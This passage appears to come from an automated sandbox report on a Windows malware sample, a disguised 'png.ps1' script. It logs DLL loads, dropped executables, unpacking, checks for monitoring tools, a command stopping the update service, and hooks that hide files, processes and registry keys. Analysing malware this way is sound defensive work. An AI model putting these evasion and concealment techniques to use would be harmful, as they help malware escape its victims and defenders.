        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dll
        Source: C:\ProgramData\Mig\Mig.exeSection loaded: apphelp.dll
        Source: C:\ProgramData\Mig\Mig.exeSection loaded: winmm.dll
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: LB31.exe, 00000006.00000002.1686134884.00007FF7E75BA000.00000040.00000001.01000000.00000009.sdmp
        Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: LB31.exe, LB31.exe, 00000006.00000002.1686134884.00007FF7E75BA000.00000040.00000001.01000000.00000009.sdmp, Mig.exe

        Data Obfuscation

        barindex
        Detected unpacking (changes PE section rights)
        Source: C:\Users\user\AppData\Roaming\LB31.exeUnpacked PE file: 6.2.LB31.exe.7ff7e7060000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R; vs :ER;.rsrc:W;`:W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R;
        Source: C:\ProgramData\Mig\Mig.exeUnpacked PE file: 40.2.Mig.exe.7ff6fd200000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R; vs :ER;.rsrc:W;z:W; :EW;ndryujmp:EW;tnyudguu:EW;.pdata:R;
        Source: initial sampleStatic PE information: section where entry point is pointing to: tnyudguu
        Source: LB31.exe.1.drStatic PE information: section name:
        Source: LB31.exe.1.drStatic PE information: section name: .idata
        Source: LB31.exe.1.drStatic PE information: section name:
        Source: LB31.exe.1.drStatic PE information: section name: ndryujmp
        Source: LB31.exe.1.drStatic PE information: section name: tnyudguu
        Source: LB31.exe.1.drStatic PE information: section name: .pdataI
        Source: Mig.exe.6.drStatic PE information: section name:
        Source: Mig.exe.6.drStatic PE information: section name: .idata
        Source: Mig.exe.6.drStatic PE information: section name:
        Source: Mig.exe.6.drStatic PE information: section name: ndryujmp
        Source: Mig.exe.6.drStatic PE information: section name: tnyudguu
        Source: Mig.exe.6.drStatic PE information: section name: .pdataI
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FF7C0ED00BD pushad ; iretd 1_2_00007FF7C0ED00C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C0D9D2A5 pushad ; iretd 3_2_00007FF7C0D9D2A6
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C0EBC2C5 push ebx; iretd 3_2_00007FF7C0EBC2DA
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C0EB2325 push eax; iretd 3_2_00007FF7C0EB233D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C0EB00BD pushad ; iretd 3_2_00007FF7C0EB00C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C0F82316 push 8B485F94h; iretd 3_2_00007FF7C0F8231B
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC5FFAACDD push rcx; retf 003Fh35_2_000001FC5FFAACDE
        Source: C:\Windows\System32\winlogon.exeCode function: 35_2_000001FC6039C6DD push rcx; retf 003Fh35_2_000001FC6039C6DE
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C735ACDD push rcx; retf 003Fh41_2_00000161C735ACDE
        Source: C:\Windows\System32\lsass.exeCode function: 41_2_00000161C738C6DD push rcx; retf 003Fh41_2_00000161C738C6DE
        Source: C:\Windows\System32\svchost.exeCode function: 42_2_00000233B91CACDD push rcx; retf 003Fh42_2_00000233B91CACDE
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_00000210918FC6DD push rcx; retf 003Fh43_2_00000210918FC6DE
        Source: C:\Windows\System32\dwm.exeCode function: 43_2_0000021091D0ACDD push rcx; retf 003Fh43_2_0000021091D0ACDE
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E97ACDD push rcx; retf 003Fh44_2_000002062E97ACDE
        Source: C:\Windows\System32\svchost.exeCode function: 44_2_000002062E9AC6DD push rcx; retf 003Fh44_2_000002062E9AC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8D8ACDD push rcx; retf 003Fh45_2_00000282B8D8ACDE
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_00000282B8DBC6DD push rcx; retf 003Fh45_2_00000282B8DBC6DE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\LB31.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\LB31.exeFile created: C:\ProgramData\Mig\Mig.exeJump to dropped file
        Source: C:\Users\user\AppData\Roaming\LB31.exeFile created: C:\ProgramData\Mig\Mig.exeJump to dropped file

        Boot Survival

        barindex
        Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
        Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\AppData\Roaming\LB31.exeWindow searched: window name: RegmonclassJump to behavior
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: FilemonClass
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: RegmonClass
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: FilemonClass
        Source: C:\ProgramData\Mig\Mig.exeWindow searched: window name: PROCMON_WINDOW_CLASS
        Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

        Hooking and other Techniques for Hiding and Protection

        barindex
        Hooks files or directories query functions (used to hide files and directories)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Hooks processes query functions (used to hide processes)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Hooks registry keys query functions (used to hide registry keys)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
        Uses an obfuscated file name to hide its real file extension (double extension)
        Source: Possible double extension: png.ps1Static PE information: 1.png.ps1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
